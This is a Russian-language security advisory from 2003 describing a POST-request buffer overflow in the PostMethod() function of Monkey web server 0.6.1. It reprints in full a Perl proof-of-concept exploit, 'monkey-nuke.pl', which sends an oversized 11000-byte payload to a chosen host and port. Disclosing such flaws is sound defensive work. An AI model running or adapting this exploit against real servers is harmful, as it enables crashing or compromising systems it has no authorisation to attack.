Дата публикации: | 24.04.2003 |
Всего просмотров: | 1113 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Переполнение буфера обнаружено в Monkey web server. Удаленный пользователь может выполнить произвольный код на целевом сервере.
Удаленный пользователь может сконструировать специально обработанную Web форму и представить ее через POST метод, чтобы вызвать переполнение буфера. Согласно сообщению, переполнение обнаружено в функции PostMethod(), в которой данные, представленные пользователем, копируются в переменную 'buffer', равную 10240 символам. Эксплоит: #!/usr/bin/perl # monkey-nuke.pl # Monkey HTTPd Remote Buffer Overflow # Discovery/Exploit by Matthew Murphy use IO::Socket; print STDOUT "What host to connect to \[\]\: "; $host = trim(chomp($line = <STDIN>)); print STDOUT "What port to connect to \[80\]\: "; $port = trim(chomp($line = <STDIN>)); $addr = "$host\:$port"; print STDOUT "What script to submit to \[\/cgi-bin\/test\.pl\]\: "; $script = trim(chomp($line = <STDIN>)); $buffer = "A"x11000; $exploit = "POST /$script HTTP/1.0\r\n"; $exploit.= "Content-Type: application/x-www-form-urlencoded\r\n"; $exploit.= "Content-Length: 11000\r\n\r\n"; $exploit.= "$buffer\r\n\r\n"; $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr); print $f $exploit; sleep 5; undef $f;Уязвимость обнаружена в Monkey Web Server 0.6.1 |
Ссылки: | Monkey HTTPd Remote Buffer Overflow |